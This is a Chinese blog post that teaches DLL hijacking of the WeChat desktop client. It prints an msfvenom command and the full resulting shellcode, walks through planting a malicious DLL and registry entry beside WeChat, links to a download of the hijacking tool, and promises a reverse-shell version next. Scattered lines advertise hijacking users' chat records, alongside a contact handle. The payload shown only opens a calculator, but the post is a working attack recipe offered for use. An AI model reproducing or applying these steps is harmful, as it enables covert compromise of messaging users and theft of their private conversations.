美文网首页黑客技术解密
微信获取DLL劫持攻击

微信获取DLL劫持攻击

作者: Hx丶G | 来源:发表于2019-12-19 22:04 被阅读0次

什么是DLL劫持呢?

引用某度的说法:

<DLL劫持>技术当一个可执行文件运行时,Windows加载器将可执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中

劫持聊天记录   看好友  是不是简单多了

比较通俗易懂的说法:

                  V❤----VS_h0no

当一个可执行程序运行时,windwos会加载程序运行必要的DLL文件,而系统会先在程序目录寻找DLL,如果没找到再到windows系统目录下寻找,最后在环境变量中列出的目录下查找,我们根据这一特性可以把恶意DLL放到程序目录下,等程序下一次运行,达到劫持目的

如何DLL劫持呢?

通常我们对某个应用,前提是没有加壳,一般我们通过分析,找到程序运行时加载的DLL,对其进行替换,当程序运行起来时,加载该DLL,就达到了劫持的目的,DLL被劫持之后,我们一般进行反弹会话之类的,此类的DLL可以通过MSF生成,我们可以在下期看看如何实现,此次我们利用自动化工具进行微信DLL劫持

V❤ ----------VS_H0BO

DLL加载顺序

1-应用程序的目录

2-c:\windows\system32

3-c:\windows\system

4-c:\windows

5-当前工作目录

6-系统PATH环境变量

7-用户PATH环境变量

我们尝试对微信进行DLL劫持,当运行的时候使其弹出计算器

msfvenom-p windows/exec cmd=calc.exe -f c -o shell.c

使用MSF生成shellcode,生成的如下:

\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00

将生成的shellcode文件复制到软件中

生成DLL,生成结果如下

接下来劫持文件

选择刚才生成的DLL文件,并选择需要劫持的程序,点击导入注册表,该程序会自动备份被劫持的可执行程序

最后我们需要将生成的两个文件复制到被劫持的可执行程序同目录下

复制完成如下(因为两个文件位置相差远,就只看到一个)

这个时候我们打开微信

成功弹出计算器,接下来我们再来尝试一下TIM

工具下载地址:

链接:https://pan.baidu.com/s/1Ku_hcLMQK07cJ1EQoN7OmA 

V❤ ----------VS_H0BO

当然我们也可以生成反弹meterpreter会话的DLL,下期带来这部分内容,感兴趣的可以关注一下!

相关文章

  • 微信获取DLL劫持攻击

    什么是DLL劫持呢? 引用某度的说法: 技术当一个可执行文件运行时,Windows加载器将可执行模块映射到进程的地...

  • 黑客渗透笔记 DLL攻击劫持和漏洞利用

    ​黑客渗透笔记 DLL攻击劫持和漏洞利用 黑客花无涯 带你走进黑客世界系列文章 学习黑客经典书籍 网络黑白 某宝有...

  • DLL劫持

    什么是DLL 动态链接库英文为DLL*,是Dynamic Link Library*的缩写。DLL是一个包含可由多...

  • 浅谈跨域劫持

    关闭页面特效 本篇文章主要讲解一下跨域攻击: Jsonp劫持 Flash跨域劫持 CORS跨域资源获取 -----...

  • 一种通用DLL劫持技术研究

    通用DLL劫持技术研究by anhkgg2018年11月29日 写在前面 Dll劫持相信大家都不陌生,理论就不多说...

  • 【CS学习笔记】13、bypassuac

    Bypass UAC 有两个步骤,分别是: 1、利用 UAC 漏洞来获取一个特权文件副本 2、使用 DLL 劫持进...

  • DLL劫持之路径劫持

    环境vs2008 DLL搜索路径 https://docs.microsoft.com/zh-cn/windows...

  • Python調用DLL - 微信截圖

    檔案:PrScrn.dll DLL可以由安裝微信或下方直接下載獲得 微信路經C:\Program Files (x...

  • 前端黑客之界面操作劫持

    什么是界面操作劫持? 界面操作劫持攻击是一种基于视觉欺骗的Web会话劫持攻击,它通过在网页的可见输 入控件上覆盖一...

  • dll加载和劫持

    一.dll加载顺序 DLL查找路径基础   应用程序可以通过以下方式控制一个DLL的加载路径:使用全路径加载、使用...

网友评论

    本文标题:微信获取DLL劫持攻击

    本文链接:https://www.haomeiwen.com/subject/ogivnctx.html